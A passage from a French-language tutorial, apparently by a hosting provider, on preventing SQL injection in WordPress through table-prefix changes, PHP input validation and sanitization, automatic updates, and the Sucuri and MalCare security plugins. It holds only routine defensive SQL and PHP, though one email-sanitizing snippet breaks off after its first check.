class=\"wp-image-23518\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Recherchez la valeur $table_prefix. Elle doit &ecirc;tre d&eacute;finie sur&nbsp; &ldquo;wp_.&rdquo;<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"545\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/public\" alt=\"Recherche de la valeur $table_prefix dans le fichier wp-config.php\" class=\"wp-image-37094\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Vous pouvez supprimer ce pr&eacute;fixe et en saisir un nouveau. Veillez &agrave; n&rsquo;utiliser qu&rsquo;une combinaison de lettres, de chiffres et de traits de soulignement. Enfin, enregistrez et fermez le fichier.<\/li>\n\n\n\n<li>Retournez dans le hPanel et trouvez la section<strong> Bases de donn&eacute;es<\/strong>. Cliquez ensuite sur <strong>phpMyAdmin<\/strong>.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"298\" height=\"333\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-sidebar-fr.png\/public\" alt=\"Le bouton phpMyAdmin sur hPanel\" class=\"wp-image-24158\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-sidebar-fr.png\/w=298,fit=scale-down 298w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-sidebar-fr.png\/w=268,fit=scale-down 268w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-sidebar-fr.png\/w=134,fit=scale-down 134w\" sizes=\"(max-width: 298px) 100vw, 298px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Sur la page suivante, s&eacute;lectionnez <strong>Enter phpMyAdmin<\/strong>. Cela ouvrira la base de donn&eacute;es de votre site.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1267\" height=\"545\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/public\" alt=\"La page phpMyAdmin sur hPanel\" class=\"wp-image-24181\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/w=1267,fit=scale-down 1267w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1267px) 100vw, 1267px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Dans phpMyAdmin, cliquez sur l&rsquo;onglet <strong>SQL<\/strong>. Pour modifier le pr&eacute;fixe de votre base de donn&eacute;es, entrez cette requ&ecirc;te dans la zone de texte :<\/li>\n<\/ul><p>RENAME table `wp_tablename` TO `wp_1secure1_tablename`;<\/p><p>Veillez &agrave; remplacer<strong> &laquo;&nbsp;wp_tablename&nbsp;&raquo;<\/strong> par le nom de votre table actuelle. Ensuite,<strong> &laquo;&nbsp;wp_1secure1_tablename&nbsp;&raquo;<\/strong> devrait avoir votre nouveau pr&eacute;fixe et nom de table.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"502\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/public\" alt=\"Modifier les valeurs de wp_tablename et wp_1secure1_tablename sur phpMyAdmin\" class=\"wp-image-37095\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Vous devrez r&eacute;p&eacute;ter ce code pour chaque table que vous souhaitez renommer. Lorsque vous avez termin&eacute;, s&eacute;lectionnez <strong>Go<\/strong>.<\/li>\n<\/ul><p>En outre, il se peut que vous deviez mettre &agrave; jour certaines valeurs de pr&eacute;fixe manuellement. Dans ce cas, vous pouvez filtrer vos valeurs pour trouver toutes les instances de l&rsquo;ancien pr&eacute;fixe :<\/p><pre class=\"wp-block-preformatted\">SELECT * FROM `wp_1secure1_tablename` WHERE `field_name` LIKE '%wp_%'<\/pre><p>Vous pouvez ensuite modifier chaque r&eacute;sultat pour qu&rsquo;il contienne la nouvelle valeur du pr&eacute;fixe. Cela devrait supprimer compl&egrave;tement le pr&eacute;fixe &laquo;&nbsp;wp_&nbsp;&raquo; de votre base de donn&eacute;es.<\/p><h3 class=\"wp-block-heading\" id=\"h-3-validez-les-entrees-des-utilisateurs\"><strong>3. Validez les entr&eacute;es des utilisateurs<\/strong><\/h3><p>Comme nous l&rsquo;avons mentionn&eacute; pr&eacute;c&eacute;demment, les pirates informatiques ex&eacute;cutent g&eacute;n&eacute;ralement des attaques SQLi en exploitant les donn&eacute;es soumises par l&rsquo;utilisateur. Il est donc important de s&eacute;curiser tous les champs d&rsquo;entr&eacute;e de votre site web, y compris les formulaires et les sections de commentaires.<\/p><p>Vous pouvez filtrer toutes les commandes soumises par les utilisateurs &agrave; l&rsquo;aide de la <a href=\"https:\/\/developer.wordpress.org\/plugins\/security\/data-validation\/\" target=\"_blank\" rel=\"noopener\"><strong>validation<\/strong><\/a> et de l&rsquo;assainissement des entr&eacute;es. Vous pouvez prot&eacute;ger efficacement votre site web contre les injections SQL en vous assurant que les formulaires ne contiennent pas de cha&icirc;nes de caract&egrave;res suppl&eacute;mentaires ou de code malveillant.<\/p><p>Pour cr&eacute;er une validation d&rsquo;entr&eacute;e pour vos formulaires, vous devez &eacute;tablir des r&egrave;gles pour les entr&eacute;es des utilisateurs. Si vous utilisez un g&eacute;n&eacute;rateur de formulaires tel que <a href=\"https:\/\/formidableforms.com\/\" target=\"_blank\" rel=\"noopener\"><strong>Formidable Forms<\/strong><\/a>, vous pouvez cr&eacute;er un <strong>format de masque d&rsquo;entr&eacute;e<\/strong>. Cela limitera la saisie &agrave; un ensemble sp&eacute;cifique de symboles.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"446\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/public\" alt=\"Cr&eacute;ation d'un format de masque de saisie sur Formidable Forms\" class=\"wp-image-37096\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Vous pouvez &eacute;galement envisager d&rsquo;inclure uniquement des menus d&eacute;roulants et des options &agrave; choix multiples. Le fait d&rsquo;&eacute;viter les zones de texte peut emp&ecirc;cher les pirates d&rsquo;exploiter les donn&eacute;es de votre formulaire.<\/p><p>La validation des donn&eacute;es peut &eacute;galement &ecirc;tre effectu&eacute;e &agrave; l&rsquo;aide de fonctions. Par exemple, si vous souhaitez limiter les soumissions aux seuls codes postaux am&eacute;ricains valides, voici la fonction que vous pouvez utiliser :<\/p><blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<blockquote class=\"wp-block-quote is-style-plain is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-preformatted\">\/**\n\n&nbsp;* Validate a US zip code.\n\n&nbsp;*\n\n&nbsp;* @param string $zip_code &nbsp; RAW zip code to check.\n\n&nbsp;*\n\n&nbsp;* @return bool&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; true if valid, false otherwise.\n\n&nbsp;*\/\n\nfunction wporg_is_valid_us_zip_code( $zip_code ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ Scenario 1: empty.\n\n&nbsp;&nbsp;&nbsp;&nbsp;if ( empty( $zip_code ) ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;\n\n&nbsp;&nbsp;&nbsp;&nbsp;}\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ Scenario 2: more than 10 characters.\n\n&nbsp;&nbsp;&nbsp;&nbsp;if ( 10 &lt; strlen( trim( $zip_code ) ) ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;\n\n&nbsp;&nbsp;&nbsp;&nbsp;}\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ Scenario 3: incorrect format.\n\n&nbsp;&nbsp;&nbsp;&nbsp;if ( ! preg_match( '\/^\\d{5}(\\-?\\d{4})?$\/', $zip_code ) ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;\n\n&nbsp;&nbsp;&nbsp;&nbsp;}\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ Passed successfully.\n\n&nbsp;&nbsp;&nbsp;&nbsp;return true;\n\n}<\/pre>\n<\/blockquote>\n<\/div>\n<\/div>\n<\/blockquote><p>Ce code &eacute;valuera le champ wporg_zip_code pour chaque soumission en fonction de ces r&egrave;gles pr&eacute;d&eacute;finies. Ensuite, il n&rsquo;effectuera l&rsquo;action que si le code postal est valide :<\/p><pre class=\"wp-block-preformatted\">if ( isset( $_POST['wporg_zip_code'] ) &amp;&amp; wporg_is_valid_us_zip_code( $_POST['wporg_zip_code'] ) ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ your action\n\n}<\/pre><p>Pour nettoyer davantage les donn&eacute;es soumises par les utilisateurs, vous pouvez assainir chaque entr&eacute;e. Si vous souhaitez assainir une adresse &eacute;lectronique, vous pouvez utiliser la fonction suivante :<\/p><pre class=\"wp-block-preformatted\">function sanitize_email( $email ) {\n\n&nbsp;&nbsp;&nbsp;&nbsp;\/\/ Test for the minimum length the email can be.\n\n&nbsp;&nbsp;&nbsp;&nbsp;if ( strlen( $email ) &lt; 6 ) {<\/pre><p>S&rsquo;il y a des caract&egrave;res suppl&eacute;mentaires qui ne sont pas inclus dans une adresse &eacute;lectronique standard, cette fonction les supprimera. Vous ne recevrez alors que des adresses &eacute;lectroniques valides et assainies.<\/p><h3 class=\"wp-block-heading\" id=\"h-4-effectuez-des-mises-a-jour-frequentes\"><strong>4. Effectuez des mises &agrave; jour fr&eacute;quentes<\/strong><\/h3><p>Lorsque vous essayez de s&eacute;curiser votre site web, pensez &agrave; utiliser les logiciels les plus r&eacute;cents. Si vous vous contentez d&rsquo;un logiciel de base, et que vous utilisez des th&egrave;mes et des plugins obsol&egrave;tes, il y a de grandes chances que votre site internet soit vuln&eacute;rable. L&rsquo;utilisation d&rsquo;une ancienne version de WordPress pr&eacute;sentera probablement des failles de s&eacute;curit&eacute; qui pourront &ecirc;tre exploit&eacute;es.<\/p><p>Pour v&eacute;rifier la pr&eacute;sence de nouvelles mises &agrave; jour, ouvrez votre tableau de bord et cliquez sur l&rsquo;onglet <strong>Mises &agrave; jour<\/strong>. Vous pouvez y <strong>mettre &agrave; jour votre site web<\/strong> avec la derni&egrave;re version de WordPress.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"558\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/public\" alt='V&eacute;rification de la derni&egrave;re version de WordPress avec un bouton \"Mise &agrave; jour vers la version 6.0.2\" pr&eacute;sent' class=\"wp-image-26943\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Vous pouvez &eacute;galement lancer des mises &agrave; jour pour les plugins et les th&egrave;mes. Toutefois, vous pouvez activer les <strong>mises &agrave; jour automatiques<\/strong> si vous ne souhaitez pas mettre &agrave; jour manuellement chaque plugin de votre site web. Pour ce faire, rendez-vous sur votre page <strong>Plugins<\/strong>. S&eacute;lectionnez ensuite l&rsquo;option <strong>Activer les mises &agrave; jour automatiques<\/strong> sur le c&ocirc;t&eacute; droit de chaque plugin.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"608\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/public\" alt=\"Mises &agrave; jour automatiques des plugins et des th&egrave;mes sur WordPress\" class=\"wp-image-26945\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Vous pouvez &eacute;galement mettre &agrave; jour automatiquement le logiciel principal de WordPress. Pour ce faire, il vous suffit d&rsquo;ajouter un peu de code &agrave; votre fichier <strong>wp-config.php<\/strong> :<\/p><pre class=\"wp-block-preformatted\">define('WP_AUTO_UPDATE_CORE', true);<\/pre><p>Vous pouvez d&eacute;sormais vous assurer que votre site utilise toujours le logiciel le plus r&eacute;cent. Gr&acirc;ce aux nouveaux correctifs de s&eacute;curit&eacute; et aux corrections de bogues, vous n&rsquo;aurez plus &agrave; vous soucier des vuln&eacute;rabilit&eacute;s de votre codage.<\/p><h3 class=\"wp-block-heading\" id=\"h-5-installez-un-plugin-d-injection-sql-pour-wordpress\"><strong>5. Installez un plugin d&rsquo;injection SQL pour WordPress<\/strong><\/h3><p>Souvent, l&rsquo;un des moyens les plus simples de pr&eacute;venir les injections SQL est d&rsquo;installer un <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/plugin-securite-wordpress\"><strong>plugin de s&eacute;curit&eacute; WordPress<\/strong><\/a>. En tant que d&eacute;butant, vous pouvez ainsi prot&eacute;ger efficacement votre site web sans avoir &agrave; modifier le code ou &agrave; effectuer d&rsquo;autres t&acirc;ches avanc&eacute;es.<\/p><p>Examinons quelques-uns des plugins de s&eacute;curit&eacute; les plus puissants du march&eacute;.<\/p><p><strong>Sucuri<\/strong><\/p><p><a href=\"https:\/\/wordpress.org\/plugins\/sucuri-scanner\/\" target=\"_blank\" rel=\"noopener\"><strong>Sucuri Security<\/strong><\/a> est l&rsquo;un des plugins de s&eacute;curit&eacute; les plus populaires, avec plus de 800 000 installations actives. Cet outil peut prot&eacute;ger votre site web contre les injections SQL gr&acirc;ce &agrave; l&rsquo;analyse des logiciels malveillants, aux notifications de s&eacute;curit&eacute; et &agrave; un pare-feu.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"772\" height=\"250\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/public\" alt=\"Banni&egrave;re web de Securi Security\" class=\"wp-image-37097\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/w=772,fit=scale-down 772w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 772px) 100vw, 772px\" \/><\/figure><\/div><p><strong>Caract&eacute;ristiques <\/strong>:<\/p><ul class=\"wp-block-list\">\n<li>Analyse &agrave; distance des logiciels malveillants<\/li>\n\n\n\n<li>Surveillance de l&rsquo;int&eacute;grit&eacute; des fichiers<\/li>\n\n\n\n<li>Audits de s&eacute;curit&eacute; concernant l&rsquo;activit&eacute;<\/li>\n\n\n\n<li>Actions de s&eacute;curit&eacute; post-piratage<\/li>\n<\/ul><p>Vous pourrez consulter les journaux d&rsquo;audit de s&eacute;curit&eacute; de votre site web m&ecirc;me avec la version de base de WordPress. Sucuri analysera vos fichiers principaux, notera toute activit&eacute; suspecte et recommandera des actions sp&eacute;cifiques pour am&eacute;liorer votre s&eacute;curit&eacute;:<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"494\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/public\" alt=\"Securi Security WordPress plugin\" class=\"wp-image-26946\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>L&rsquo;une des principales caract&eacute;ristiques de Sucuri est son pare-feu. Il inspecte tout le trafic HTTP et HTTPS avant qu&rsquo;il n&rsquo;entre en contact avec votre serveur. Gr&acirc;ce &agrave; la d&eacute;tection de signatures de haute qualit&eacute;, Sucuri peut bloquer toutes les requ&ecirc;tes malveillantes avant qu&rsquo;elles ne causent des dommages.<\/p><p>La version premium de Sucuri peut fournir un nombre illimit&eacute; de suppressions de logiciels malveillants par ses propres experts en s&eacute;curit&eacute;. Vous aurez &eacute;galement acc&egrave;s &agrave; des analyses de s&eacute;curit&eacute; avanc&eacute;es, &agrave; une att&eacute;nuation des attaques DDoS et &agrave; un <strong>r&eacute;seau de diffusion de contenu (CDN)<\/strong>.<\/p><p><strong>Prix <\/strong>: Sucuri Security est un plugin WordPress gratuit. Cependant, si vous souhaitez acc&eacute;der au pare-feu d&rsquo;applications web, vous devrez acheter un <a href=\"https:\/\/sucuri.net\/website-security-platform\/signup\/\" target=\"_blank\" rel=\"noopener\"><strong>plan premium<\/strong><\/a> disponible &agrave; partir de <strong>199.99 $\/an<\/strong>.<\/p><p><strong>MalCare<\/strong><\/p><p><a href=\"https:\/\/wordpress.org\/plugins\/malcare-security\/\" target=\"_blank\" rel=\"noopener\"><strong>MalCare<\/strong><\/a> est un autre outil efficace pour la pr&eacute;vention de SQLi. Ce plugin WordPress peut effectuer une recherche approfondie de logiciels malveillants sur votre site web et vous avertir de toute vuln&eacute;rabilit&eacute;. Avec MalCare, vous pouvez automatiquement nettoyer votre site et &eacute;viter de nombreux <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/securite-wordpress\"><strong>probl&egrave;mes de s&eacute;curit&eacute; WordPress<\/strong><\/a> permettant une injection SQL.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"337\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/public\" alt=\"Banni&egrave;re web MalCare WordPress security plugin\" class=\"wp-image-37098\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p><strong>Caract&eacute;ristiques <\/strong>:<\/p><ul class=\"wp-block-list\">\n<li>Scanner de logiciels malveillants bas&eacute; sur le cloud<\/li>\n\n\n\n<li>Alertes sur les risques de s&eacute;curit&eacute;<\/li>\n\n\n\n<li>Suppression des logiciels malveillants en un clic<\/li>\n\n\n\n<li>Identifie et bloque le trafic malveillant<\/li>\n<\/ul><p>Apr&egrave;s avoir install&eacute; la version gratuite vous pourrez mettre en place une protection en temps r&eacute;el contre les logiciels malveillants. MalCare analyse d&rsquo;abord votre site web et vous donne un &eacute;tat de s&eacute;curit&eacute;. Il continuera ensuite &agrave; effectuer des analyses quotidiennes des logiciels malveillants<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"839\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/public\" alt=\"tableau de bord MalCare, un plugin de s&eacute;curit&eacute; WordPress\" class=\"wp-image-37099\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Contrairement &agrave; Sucuri, MalCare impl&eacute;mente un pare-feu gratuit sur votre site web. Celui-ci peut bloquer les injections SQL, ainsi que les attaques par scripts intersites. Il fournit &eacute;galement une protection de la connexion, prot&eacute;geant votre site contre les attaques par force brute.<\/p><p>&Eacute;tant donn&eacute; que le tableau de bord MalCare affiche des analyses pour plusieurs sites, ce plugin peut &ecirc;tre un outil pr&eacute;cieux pour les d&eacute;veloppeurs. Vous pouvez rapidement 